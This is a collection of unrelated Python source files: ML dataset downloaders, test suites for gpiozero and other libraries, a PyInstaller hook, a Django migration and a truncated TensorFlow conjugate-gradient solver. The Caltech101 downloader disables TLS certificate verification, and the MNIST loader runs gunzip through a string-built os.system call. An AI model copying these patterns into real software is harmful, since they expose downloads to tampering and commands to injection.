LEVEL2_SUCC = "Help tiling level 2 exit successfully"
LEVEL3_SUCC = "Help tiling level 3 exit successfully"
def build_five2four(shape_5d, dtype, op_attrs, attrs, kernel_name='five2four', tuning=False):
from akg.ops.array.ascend import five2four
utils.op_build_test(five2four.five2four, [shape_5d], [dtype], op_attrs, kernel_name=kernel_name, attrs=attrs, tuning=tuning)
def test_five2four():
shape_5d = [1, 1, 1088, 1, 16]
dtype = "float32"
op_attrs = [[1, 1088, 1, 16], "float32", 'NHWC']
try:
attrs = {"help_tiling": 1}
build_five2four(shape_5d, dtype, op_attrs, attrs)
except SystemExit:
logging.info(LEVEL1_SUCC)
try:
attrs = {"help_tiling": 2}
build_five2four(shape_5d, dtype, op_attrs, attrs)
except SystemExit:
logging.info(LEVEL2_SUCC)
try:
attrs = {"help_tiling": 3}
build_five2four(shape_5d, dtype, op_attrs, attrs)
except SystemExit:
logging.info(LEVEL3_SUCC)
if __name__ == "__main__":
test_five2four()
|
stonesoup/detector/tests/test_tensorflow.py | Red-Portal/Stone-Soup-1 | 157 | 12635246 | # -*- coding: utf-8 -*-
import pytest
try:
from stonesoup.detector.tensorflow import TensorFlowBoxObjectDetector
except ImportError:
# Catch optional dependencies import error
pytest.skip(
"Skipping due to missing optional dependencies. Usage of the TensorFlow detectors "
"requires that TensorFlow and the TensorFlow Object Detection API are installed. A quick "
"guide on how to set these up can be found here: "
"https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html",
allow_module_level=True
)
def test_tensorflow_box_object_detector():
# Expect Type error
with pytest.raises(TypeError):
TensorFlowBoxObjectDetector()
# TODO: Add more tests
|
libs/input_modules/get_datasets.py | dylancashman/metaqnn | 136 | 12635252 | <gh_stars>100-1000
import numpy as np
import os
import pickle
import shutil
import struct
import tarfile
import urllib
import ssl
from scipy import io, misc
def get_caltech101(save_dir=None, root_path=None):
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
print 'Downloading Caltech101 dataset...'
tar_path = os.path.join(save_dir, "101_ObjectCategories.tar.gz")
url = urllib.URLopener(context=ctx)
url.retrieve("https://www.vision.caltech.edu/Image_Datasets/Caltech101/101_ObjectCategories.tar.gz", tar_path)
print 'Download Done, Extracting...'
tar = tarfile.open(tar_path)
tar.extractall(save_dir)
tar.close()
root = os.path.join(save_dir, "101_ObjectCategories") if not root_path else root_path
train_x = []
train_y = []
val_x = []
val_y = []
label = 0
for cls_folder in os.listdir(root):
cls_root = os.path.join(root, cls_folder)
if not os.path.isdir(cls_root):
continue
cls_images = [misc.imread(os.path.join(cls_root, img_name)) for img_name in os.listdir(cls_root)]
cls_images = [np.repeat(np.expand_dims(img, 2), 3, axis=2) if len(img.shape) == 2 else img for img in cls_images]
cls_images = np.array([np.reshape(misc.imresize(img, (224,224,3)), (3,224,224)) for img in cls_images])
new_index = np.random.permutation(np.arange(cls_images.shape[0]))
cls_images = cls_images[new_index, :, :, :]
train_x.append(cls_images[:30])
train_y.append(np.array([label]*30))
if len(cls_images) <= 80:
val_x.append(cls_images[30:])
val_y.append(np.array([label]*(len(cls_images)-30)))
else:
val_x.append(cls_images[30:80])
val_y.append(np.array([label]*50))
label += 1
Xtr = np.concatenate(train_x)
Ytr = np.concatenate(train_y)
Xval= np.concatenate(val_x)
Yval= np.concatenate(val_y)
print 'Xtr shape ', Xtr.shape
print 'Ytr shape ', Ytr.shape
print 'Xval shape ', Xval.shape
print 'Yval shape ', Yval.shape
return Xtr, Ytr, Xval, Yval
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = pickle.load(f)
X = datadict['data']
Y = datadict['labels']
X = X.reshape(10000, 3, 32, 32).astype(np.uint8)
Y = np.array(Y, dtype=np.int64)
return X, Y
def get_cifar10(save_dir=None, root_path=None):
''' If root_path is None, the data set is downloaded from the internet.
Exactly one of save_dir and root_path must be provided (not both).
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
print 'Downloading CIFAR10 dataset...'
tar_path = os.path.join(save_dir, "cifar-10-python.tar.gz")
url = urllib.URLopener()
url.retrieve("https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz", tar_path)
print 'Download Done, Extracting...'
tar = tarfile.open(tar_path)
tar.extractall(save_dir)
tar.close()
root = os.path.join(save_dir, "cifar-10-batches-py") if not root_path else root_path
# Training Data
xs = []
ys = []
for b in range(1,6):
f = os.path.join(root, 'data_batch_%d' % (b, ))
X, Y = load_CIFAR_batch(f)
xs.append(X)
ys.append(Y)
Xtr = np.concatenate(xs)
Ytr = np.concatenate(ys)
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
# Testing data
Xte, Yte = load_CIFAR_batch(os.path.join(root, 'test_batch'))
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte
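# Minimal usage sketch (the path below is illustrative): on first use the
# archive is downloaded and unpacked under save_dir, and uint8 arrays in
# NCHW layout are returned.
#
#   Xtr, Ytr, Xte, Yte = get_cifar10(save_dir='/tmp/cifar10_data')
#   # Xtr.shape == (50000, 3, 32, 32), Xte.shape == (10000, 3, 32, 32)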
def get_svhn(save_dir=None, root_path=None):
''' If root_path is None, the data set is downloaded from the internet.
Exactly one of save_dir and root_path must be provided (not both).
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
new_save_dir = os.path.join(save_dir, 'og_data')
if not os.path.isdir(new_save_dir):
os.mkdir(new_save_dir)
train_mat = os.path.join(new_save_dir, "train_32x32.mat")
test_mat = os.path.join(new_save_dir, "test_32x32.mat")
url = urllib.URLopener()
print 'Downloading Svhn Train...'
url.retrieve("http://ufldl.stanford.edu/housenumbers/train_32x32.mat", train_mat)
print 'Downloading Svhn Test...'
url.retrieve("http://ufldl.stanford.edu/housenumbers/test_32x32.mat", test_mat)
root = new_save_dir if not root_path else root_path
train = io.loadmat(os.path.join(root, 'train_32x32.mat'))
Xtr = train['X']
Ytr = train['y']
del train
test = io.loadmat(os.path.join(root, 'test_32x32.mat'))
Xte = test['X']
Yte = test['y']
del test
Xtr = np.transpose(Xtr, (3, 2, 0, 1))
Xte = np.transpose(Xte, (3, 2, 0, 1))
Ytr = Ytr.reshape(Ytr.shape[:1]) - 1
Yte = Yte.reshape(Yte.shape[:1]) - 1
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte
def get_svhn_small(save_dir=None, root_path=None):
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
Xtr, Ytr, Xte, Yte = get_svhn(save_dir, root_path)
val_x = []
val_y = []
train_x = []
train_y = []
for i in np.unique(Ytr):
# Take 700 training and 300 validation images per class from the small training set
X_small_label = Xtr[Ytr == i]
train_x.append(X_small_label[:700])
train_y.append([i]*700)
val_x.append(X_small_label[700:1000])
val_y.append([i]*300)
Xtr = np.concatenate(train_x)
Ytr = np.concatenate(train_y)
Xval = np.concatenate(val_x)
Yval = np.concatenate(val_y)
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
print 'Xval shape', Xval.shape
print 'Yval shape', Yval.shape
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xval, Yval, Xte, Yte
def get_svhn_full(save_dir=None, root_path=None):
''' If root_path is None, the data set is downloaded from the internet.
Exactly one of save_dir and root_path must be provided (not both).
Returns Xtr, Ytr, Xval, Yval, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
Xtr_small, Ytr_small, Xte, Yte = get_svhn(save_dir, root_path)
if root_path is None:
new_save_dir = os.path.join(save_dir, 'og_data')
if not os.path.isdir(new_save_dir):
os.mkdir(new_save_dir)
extra_mat = os.path.join(new_save_dir, "extra_32x32.mat")
url = urllib.URLopener()
print 'Downloading Svhn Extra...'
url.retrieve("http://ufldl.stanford.edu/housenumbers/extra_32x32.mat", extra_mat)
root = new_save_dir if not root_path else root_path
extra = io.loadmat(os.path.join(root, 'extra_32x32.mat'))
Xtr_extra = extra['X']
Ytr_extra = extra['y']
Xtr_extra = np.transpose(Xtr_extra, (3, 2, 0, 1))
Ytr_extra = Ytr_extra.reshape(Ytr_extra.shape[:1]) - 1
print 'Xextra shape', Xtr_extra.shape
print 'Yextra shape', Ytr_extra.shape
val_x = []
val_y = []
train_x = []
train_y = []
for i in np.unique(Ytr_small):
# Get 400 images from X_small
X_small_label = Xtr_small[Ytr_small == i]
val_x.append(X_small_label[:400])
val_y.append([i]*400)
train_x.append(X_small_label[400:])
train_y.append([i]*(X_small_label.shape[0] - 400))
# Get 200 images from X_extra
X_extra_label = Xtr_extra[Ytr_extra == i]
val_x.append(X_extra_label[:200])
val_y.append([i]*200)
train_x.append(X_extra_label[200:])
train_y.append([i]*(X_extra_label.shape[0] - 200))
Xtr = np.concatenate(train_x)
Ytr = np.concatenate(train_y)
Xval = np.concatenate(val_x)
Yval = np.concatenate(val_y)
return Xtr, Ytr, Xval, Yval, Xte, Yte
def load_cifar100_data(filename):
with open(filename, 'rb') as f:
datadict = pickle.load(f)
data = datadict['data']
labels = datadict['fine_labels']
N = len(labels)
data = data.reshape((N, 3, 32, 32))
labels = np.array(labels)
return data,labels
def get_cifar100(save_dir=None, root_path=None):
''' If root_path is None, the data set is downloaded from the internet.
Exactly one of save_dir and root_path must be provided (not both).
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
print 'Downloading CIFAR100 dataset...'
tar_path = os.path.join(save_dir, "cifar-100-python.tar.gz")
url = urllib.URLopener()
url.retrieve("https://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz", tar_path)
print 'Download Done, Extracting...'
tar = tarfile.open(tar_path)
tar.extractall(save_dir)
tar.close()
root = os.path.join(save_dir, "cifar-100-python") if not root_path else root_path
Xtr, Ytr = load_cifar100_data(os.path.join(root, 'train'))
Xte, Yte = load_cifar100_data(os.path.join(root, 'test'))
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte
def get_byte(file_in):
int_out = ord(file_in.read(1))
return int_out
def get_int(file_in):
int_out = struct.unpack('>i', file_in.read(4))[0]
return int_out
def get_image(file_in, row=28, col=28):
raw_data = file_in.read(row*col)
out_image = np.frombuffer(raw_data, np.uint8)
out_image = out_image.reshape((row, col))
return out_image
def load_mnist(image_fname, label_fname):
with open(image_fname, "rb") as image_file, open(label_fname, "rb") as label_file:
assert(get_int(image_file) == 2051)
assert(get_int(label_file) == 2049)
n_items_label =get_int(label_file)
n_items = get_int(image_file)
assert(n_items_label == n_items)
assert(get_int(image_file) == 28)
assert(get_int(image_file) == 28)
Y = []
X = np.zeros((n_items, 1, 28, 28), dtype=np.uint8)
print "Reading [%d] items" % n_items
for i in range(n_items):
label = get_byte(label_file)
assert(label <= 9)
assert(label >= 0)
Y.append(label)
X[i,:] = get_image(image_file)
return X, np.asarray(Y)
def get_mnist(save_dir=None, root_path=None):
''' If root_path is None, the data set is downloaded from the internet.
Exactly one of save_dir and root_path must be provided (not both).
Returns Xtr, Ytr, Xte, Yte as numpy arrays
'''
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
mnist_files = ['train-images-idx3-ubyte', 'train-labels-idx1-ubyte',
't10k-images-idx3-ubyte','t10k-labels-idx1-ubyte']
out_mnist_files = []
if root_path is None:
print 'Downloading MNIST dataset...'
for fname in mnist_files:
out_file = os.path.join(save_dir, "%s" % fname)
tar_path = os.path.join(save_dir, "%s.gz" % fname)
out_mnist_files.append(out_file)
url = urllib.URLopener()
url.retrieve("http://yann.lecun.com/exdb/mnist/%s.gz" % fname, tar_path)
print 'Download Done, Extracting... [%s]' % tar_path
os.system('gunzip -f %s' % tar_path)
Xtr, Ytr = load_mnist(out_mnist_files[0], out_mnist_files[1])
print 'Xtrain shape', Xtr.shape
print 'Ytrain shape', Ytr.shape
# Testing data
Xte, Yte = load_mnist(out_mnist_files[2], out_mnist_files[3])
print 'Xtest shape', Xte.shape
print 'Ytest shape', Yte.shape
return Xtr, Ytr, Xte, Yte |
Chapter03/eval.py | jvstinian/Python-Reinforcement-Learning-Projects | 114 | 12635263 | <reponame>jvstinian/Python-Reinforcement-Learning-Projects<gh_stars>100-1000
'''
Created on Mar 28, 2018
@author: ywz
'''
import os
import argparse
import tensorflow as tf
from q_learning import DQN
from config import ATARI, DEMO
from environment import new_atari_game, new_demo
def main():
parser = argparse.ArgumentParser(description=None)
parser.add_argument('-g', '--game', default='demo', type=str, help='Game')
parser.add_argument('-d', '--device', default='cpu', type=str, help='Device')
args = parser.parse_args()
rom = args.game
if rom == 'demo':
game = new_demo()
conf = DEMO
else:
game = new_atari_game(rom)
conf = ATARI
model_dir = os.path.join(conf['log_dir'], rom)
device = '/{}:0'.format(args.device)
with tf.device(device):
dqn = DQN(conf, game, model_dir, callback=game.draw)
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
saver = tf.train.Saver()
dqn.load(sess, saver)
dqn.evaluate(sess)
if __name__ == "__main__":
main()
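# Example invocation (flag names taken from the argparse setup above; a trained
# checkpoint is assumed to exist under conf['log_dir']/<game>):
#   python eval.py --game demo --device cpu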
|
PyInstaller/hooks/hook-sphinx.py | hawkhai/pyinstaller | 9,267 | 12635301 | <filename>PyInstaller/hooks/hook-sphinx.py
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
from PyInstaller.utils.hooks import collect_data_files, collect_submodules, eval_statement
# Sphinx consists of several extensions that are lazily loaded. So collect all submodules to ensure we do not miss
# any of them.
hiddenimports = collect_submodules('sphinx')
# For each extension in sphinx.application.builtin_extensions that does not come from the sphinx package, do a
# collect_submodules(). We need to do this explicitly because collect_submodules() does not seem to work with
# namespace packages, which precludes us from simply doing hiddenimports += collect_submodules('sphinxcontrib')
builtin_extensions = list(
eval_statement(
"""
from sphinx.application import builtin_extensions
print(builtin_extensions)
"""
)
)
for extension in builtin_extensions:
if extension.startswith('sphinx.'):
continue # Already collected
hiddenimports += collect_submodules(extension)
# This is inherited from an earlier version of the hook, and seems to have been required in Sphinx v.1.3.1 era due to
# https://github.com/sphinx-doc/sphinx/blob/b87ce32e7dc09773f9e71305e66e8d6aead53dd1/sphinx/cmdline.py#L173.
# It does not hurt to keep it around, just in case.
hiddenimports += ['locale']
# Collect all data files: *.html and *.conf files in ``sphinx.themes``, translation files in ``sphinx.locale``, etc.
# Also collect all data files for the alabaster theme.
datas = collect_data_files('sphinx') + collect_data_files('alabaster')
|
tests/test_real_pins.py | codecademy-engineering/gpiozero | 743 | 12635302 | <gh_stars>100-1000
# vim: set fileencoding=utf-8:
#
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
#
# Copyright (c) 2016-2021 <NAME> <<EMAIL>>
# Copyright (c) 2020 <NAME> <<EMAIL>>
#
# SPDX-License-Identifier: BSD-3-Clause
import os
import errno
from time import time, sleep
from math import isclose
from unittest import mock
import pytest
import pkg_resources
from gpiozero import *
from gpiozero.pins.mock import MockConnectedPin, MockFactory, MockSPIDevice
from gpiozero.pins.native import NativeFactory
from gpiozero.pins.local import LocalPiFactory
# This module assumes you've wired the following GPIO pins together. The pins
# can be re-configured via the listed environment variables (useful for when
# your testing rig requires different pins because the defaults interfere with
# attached hardware).
TEST_PIN = int(os.environ.get('GPIOZERO_TEST_PIN', '22'))
INPUT_PIN = int(os.environ.get('GPIOZERO_TEST_INPUT_PIN', '27'))
TEST_LOCK = os.environ.get('GPIOZERO_TEST_LOCK', '/tmp/real_pins_lock')
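# To run against a differently-wired rig, override the defaults via the
# environment (pin numbers below are illustrative BCM numbers):
#   GPIOZERO_TEST_PIN=23 GPIOZERO_TEST_INPUT_PIN=24 pytest tests/test_real_pins.py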
local_only = pytest.mark.skipif(
not isinstance(Device.pin_factory, LocalPiFactory),
reason="Test cannot run with non-local pin factories")
@pytest.fixture(
scope='module',
params=[
name
for name in pkg_resources.\
get_distribution('gpiozero').\
get_entry_map('gpiozero_pin_factories').keys()
])
def pin_factory_name(request):
return request.param
@pytest.fixture()
def pin_factory(request, pin_factory_name):
try:
factory = pkg_resources.load_entry_point(
'gpiozero', 'gpiozero_pin_factories', pin_factory_name)()
except Exception as e:
pytest.skip("skipped factory {pin_factory_name}: {e!s}".format(
pin_factory_name=pin_factory_name, e=e))
else:
yield factory
factory.close()
@pytest.fixture()
def default_factory(request, pin_factory):
save_pin_factory = Device.pin_factory
Device.pin_factory = pin_factory
yield pin_factory
Device.pin_factory = save_pin_factory
@pytest.fixture(scope='function')
def pins(request, pin_factory):
# Why return both pins in a single fixture? If we defined one fixture for
# each pin then pytest will (correctly) test RPiGPIOPin(22) against
# NativePin(27) and so on. This isn't supported, so we don't test it
assert not (
{INPUT_PIN, TEST_PIN} & {2, 3, 7, 8, 9, 10, 11}), \
'Cannot use SPI (7-11) or I2C (2-3) pins for tests'
input_pin = pin_factory.pin(INPUT_PIN)
input_pin.function = 'input'
input_pin.pull = 'down'
if isinstance(pin_factory, MockFactory):
test_pin = pin_factory.pin(TEST_PIN, pin_class=MockConnectedPin, input_pin=input_pin)
else:
test_pin = pin_factory.pin(TEST_PIN)
yield test_pin, input_pin
test_pin.close()
input_pin.close()
def setup_module(module):
start = time()
while True:
if time() - start > 300: # 5 minute timeout
raise RuntimeError('timed out waiting for real pins lock')
try:
with open(TEST_LOCK, 'x') as f:
f.write('Lock file for gpiozero real-pin tests; delete '
'this if the test suite is not currently running\n')
except FileExistsError:
print('Waiting for lock before testing real-pins')
sleep(0.1)
else:
break
def teardown_module(module):
os.unlink(TEST_LOCK)
def test_pin_numbers(pins):
test_pin, input_pin = pins
assert test_pin.number == TEST_PIN
assert input_pin.number == INPUT_PIN
def test_function_bad(pins):
test_pin, input_pin = pins
with pytest.raises(PinInvalidFunction):
test_pin.function = 'foo'
def test_output(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
test_pin.state = 0
assert input_pin.state == 0
test_pin.state = 1
assert input_pin.state == 1
def test_output_with_state(pins):
test_pin, input_pin = pins
test_pin.output_with_state(0)
assert input_pin.state == 0
test_pin.output_with_state(1)
assert input_pin.state == 1
def test_pull(pins):
test_pin, input_pin = pins
input_pin.pull = 'floating'
test_pin.function = 'input'
test_pin.pull = 'up'
assert test_pin.state == 1
assert input_pin.state == 1
test_pin.pull = 'down'
assert test_pin.state == 0
assert input_pin.state == 0
def test_pull_bad(pins):
test_pin, input_pin = pins
test_pin.function = 'input'
with pytest.raises(PinInvalidPull):
test_pin.pull = 'foo'
with pytest.raises(PinInvalidPull):
test_pin.input_with_pull('foo')
def test_pull_down_warning(pin_factory):
if pin_factory.pi_info.pulled_up('GPIO2'):
pin = pin_factory.pin(2)
try:
with pytest.raises(PinFixedPull):
pin.pull = 'down'
with pytest.raises(PinFixedPull):
pin.input_with_pull('down')
finally:
pin.close()
else:
pytest.skip("GPIO2 isn't pulled up on this pi")
def test_input_with_pull(pins):
test_pin, input_pin = pins
input_pin.pull = 'floating'
test_pin.input_with_pull('up')
assert test_pin.state == 1
assert input_pin.state == 1
test_pin.input_with_pull('down')
assert test_pin.state == 0
assert input_pin.state == 0
def test_pulls_are_weak(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
for pull in ('floating', 'down', 'up'):
input_pin.pull = pull
test_pin.state = 0
assert input_pin.state == 0
test_pin.state = 1
assert input_pin.state == 1
def test_bad_duty_cycle(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
try:
# NOTE: There's some race in RPi.GPIO that causes a segfault if we
# don't pause before starting PWM; only seems to happen when stopping
# and restarting PWM very rapidly (i.e. between test cases).
if Device.pin_factory.__class__.__name__ == 'RPiGPIOFactory':
sleep(0.1)
test_pin.frequency = 100
except PinPWMUnsupported:
pytest.skip("{test_pin.factory!r} doesn't support PWM".format(
test_pin=test_pin))
else:
try:
with pytest.raises(ValueError):
test_pin.state = 1.1
finally:
test_pin.frequency = None
def test_duty_cycles(pins):
test_pin, input_pin = pins
test_pin.function = 'output'
try:
# NOTE: see above
if Device.pin_factory.__class__.__name__ == 'RPiGPIOFactory':
sleep(0.1)
test_pin.frequency = 100
except PinPWMUnsupported:
pytest.skip("{test_pin.factory!r} doesn't support PWM".format(
test_pin=test_pin))
else:
try:
for duty_cycle in (0.0, 0.1, 0.5, 1.0):
test_pin.state = duty_cycle
assert test_pin.state == duty_cycle
total = sum(input_pin.state for i in range(20000))
assert isclose(total / 20000, duty_cycle, rel_tol=0.1, abs_tol=0.1)
finally:
test_pin.frequency = None
def test_explicit_factory(no_default_factory, pin_factory):
with GPIODevice(TEST_PIN, pin_factory=pin_factory) as device:
assert Device.pin_factory is None
assert device.pin_factory is pin_factory
assert device.pin.number == TEST_PIN
def test_envvar_factory(no_default_factory, pin_factory_name):
os.environ['GPIOZERO_PIN_FACTORY'] = pin_factory_name
assert Device.pin_factory is None
try:
device = GPIODevice(TEST_PIN)
except Exception as e:
pytest.skip("skipped factory {pin_factory_name}: {e!s}".format(
pin_factory_name=pin_factory_name, e=e))
else:
try:
group = 'gpiozero_pin_factories'
for factory in pkg_resources.iter_entry_points(group, pin_factory_name):
factory_class = factory.load()
assert isinstance(Device.pin_factory, factory_class)
assert device.pin_factory is Device.pin_factory
assert device.pin.number == TEST_PIN
finally:
device.close()
Device.pin_factory.close()
def test_compatibility_names(no_default_factory):
os.environ['GPIOZERO_PIN_FACTORY'] = 'NATIVE'
try:
device = GPIODevice(TEST_PIN)
except Exception as e:
pytest.skip("skipped factory {pin_factory_name}: {e!s}".format(
pin_factory_name=pin_factory_name, e=e))
else:
try:
assert isinstance(Device.pin_factory, NativeFactory)
assert device.pin_factory is Device.pin_factory
assert device.pin.number == TEST_PIN
finally:
device.close()
Device.pin_factory.close()
def test_bad_factory(no_default_factory):
os.environ['GPIOZERO_PIN_FACTORY'] = 'foobarbaz'
# Waits for someone to implement the foobarbaz pin factory just to
# mess with our tests ...
with pytest.raises(BadPinFactory):
GPIODevice(TEST_PIN)
def test_default_factory(no_default_factory):
assert Device.pin_factory is None
os.environ.pop('GPIOZERO_PIN_FACTORY', None)
try:
device = GPIODevice(TEST_PIN)
except Exception as e:
pytest.skip("no default factories")
else:
try:
assert device.pin_factory is Device.pin_factory
assert device.pin.number == TEST_PIN
finally:
device.close()
Device.pin_factory.close()
def test_spi_init(pin_factory):
with pin_factory.spi() as intf:
assert isinstance(intf, SPI)
assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=8)'
intf.close()
assert intf.closed
assert repr(intf) == 'SPI(closed)'
with pin_factory.spi(port=0, device=1) as intf:
assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=7)'
with pin_factory.spi(clock_pin=11, mosi_pin=10, select_pin=8) as intf:
assert repr(intf) == 'SPI(clock_pin=11, mosi_pin=10, miso_pin=9, select_pin=8)'
# Ensure we support "partial" SPI where we don't reserve a pin because
# the device wants it for general IO (see SPI screens which use a pin
# for data/commands)
with pin_factory.spi(clock_pin=11, mosi_pin=10, miso_pin=None, select_pin=7) as intf:
assert isinstance(intf, SPI)
with pin_factory.spi(clock_pin=11, mosi_pin=None, miso_pin=9, select_pin=7) as intf:
assert isinstance(intf, SPI)
with pin_factory.spi(shared=True) as intf:
assert isinstance(intf, SPI)
with pytest.raises(ValueError):
pin_factory.spi(port=1)
with pytest.raises(ValueError):
pin_factory.spi(device=2)
with pytest.raises(ValueError):
pin_factory.spi(port=0, clock_pin=12)
with pytest.raises(ValueError):
pin_factory.spi(foo='bar')
def test_spi_hardware_conflict(default_factory):
with LED(11) as led:
with pytest.raises(GPIOPinInUse):
Device.pin_factory.spi(port=0, device=0)
with Device.pin_factory.spi(port=0, device=0) as spi:
with pytest.raises(GPIOPinInUse):
LED(11)
def test_spi_hardware_same_bus(default_factory):
with Device.pin_factory.spi(device=0) as intf:
with pytest.raises(GPIOPinInUse):
Device.pin_factory.spi(device=0)
with Device.pin_factory.spi(device=1) as another_intf:
assert intf._bus is another_intf._bus
def test_spi_hardware_shared_bus(default_factory):
with Device.pin_factory.spi(device=0, shared=True) as intf:
with Device.pin_factory.spi(device=0, shared=True) as another_intf:
assert intf is another_intf
@local_only
def test_spi_hardware_read(default_factory):
with mock.patch('gpiozero.pins.local.SpiDev') as spidev:
spidev.return_value.xfer2.side_effect = lambda data: list(range(10))[:len(data)]
with Device.pin_factory.spi() as intf:
assert intf.read(3) == [0, 1, 2]
assert intf.read(6) == list(range(6))
@local_only
def test_spi_hardware_write(default_factory):
with mock.patch('gpiozero.pins.local.SpiDev') as spidev:
spidev.return_value.xfer2.side_effect = lambda data: list(range(10))[:len(data)]
with Device.pin_factory.spi() as intf:
assert intf.write([0, 1, 2]) == 3
spidev.return_value.xfer2.assert_called_with([0, 1, 2])
assert intf.write(list(range(6))) == 6
spidev.return_value.xfer2.assert_called_with(list(range(6)))
@local_only
def test_spi_hardware_modes(default_factory):
with mock.patch('gpiozero.pins.local.SpiDev') as spidev:
spidev.return_value.mode = 0
spidev.return_value.lsbfirst = False
spidev.return_value.cshigh = True
spidev.return_value.bits_per_word = 8
with Device.pin_factory.spi() as intf:
assert intf.clock_mode == 0
assert not intf.clock_polarity
assert not intf.clock_phase
intf.clock_polarity = False
assert intf.clock_mode == 0
intf.clock_polarity = True
assert intf.clock_mode == 2
intf.clock_phase = True
assert intf.clock_mode == 3
assert not intf.lsb_first
assert intf.select_high
assert intf.bits_per_word == 8
intf.select_high = False
intf.lsb_first = True
intf.bits_per_word = 12
assert not spidev.return_value.cshigh
assert spidev.return_value.lsbfirst
assert spidev.return_value.bits_per_word == 12
intf.rate = 1000000
assert intf.rate == 1000000
intf.rate = 500000
assert intf.rate == 500000
# XXX Test two simultaneous SPI devices sharing clock, MOSI, and MISO, with
# separate select pins (including threaded tests which attempt simultaneous
# reading/writing)
|
src/olympia/addons/migrations/0021_auto_20200909_1302.py | osamamagdy/addons-server | 843 | 12635304 | # Generated by Django 2.2.16 on 2020-09-09 13:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("addons", "0020_auto_20200805_1350"),
]
operations = [
migrations.AlterField(
model_name="addon",
name="total_downloads",
field=models.PositiveIntegerField(
db_column="totaldownloads", default=0, null=True
),
),
]
|
tensorflow/contrib/solvers/python/ops/linear_equations.py | AlexChrisF/udacity | 522 | 12635305 | <reponame>AlexChrisF/udacity
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Solvers for linear equations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.contrib.solvers.python.ops import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
def conjugate_gradient(operator,
rhs,
tol=1e-4,
max_iter=20,
name="conjugate_gradient"):
r"""Conjugate gradient solver.
Solves a linear system of equations `A*x = rhs` for self-adjoint, positive
definite matrix `A` and right-hand side vector `rhs`, using an iterative,
matrix-free algorithm where the action of the matrix A is represented by
`operator`. The iteration terminates when either the number of iterations
exceeds `max_iter` or when the residual norm has been reduced to `tol`
times its initial value, i.e. \\(||rhs - A x_k|| <= tol ||rhs||\\).
Args:
operator: An object representing a linear operator with attributes:
- shape: Either a list of integers or a 1-D `Tensor` of type `int32` of
length 2. `shape[0]` is the dimension of the domain of the operator,
`shape[1]` is the dimension of the co-domain of the operator. In other
words, if operator represents an N x N matrix A, `shape` must contain
`[N, N]`.
- dtype: The datatype of input to and output from `apply`.
- apply: Callable object taking a vector `x` as input and returning a
vector with the result of applying the operator to `x`, i.e. if
`operator` represents matrix `A`, `apply` should return `A * x`.
rhs: A rank-1 `Tensor` of shape `[N]` containing the right-hand side vector.
tol: A float scalar convergence tolerance.
max_iter: An integer giving the maximum number of iterations.
name: A name scope for the operation.
Returns:
output: A namedtuple representing the final state with fields:
- i: A scalar `int32` `Tensor`. Number of iterations executed.
- x: A rank-1 `Tensor` of shape `[N]` containing the computed solution.
- r: A rank-1 `Tensor` of shape `[M]` containing the residual vector.
- p: A rank-1 `Tensor` of shape `[N]`. `A`-conjugate basis vector.
- gamma: \\(||r||_2^2\\)
"""
# ephemeral class holding CG state.
cg_state = collections.namedtuple("CGState", ["i", "x", "r", "p", "gamma"])
def stopping_criterion(i, state):
return math_ops.logical_and(i < max_iter, state.gamma > tol)
# TODO(rmlarsen): add preconditioning
def cg_step(i, state):
z = operator.apply(state.p)
alpha = state.gamma / util.dot(state.p, z)
x = state.x + alpha * state.p
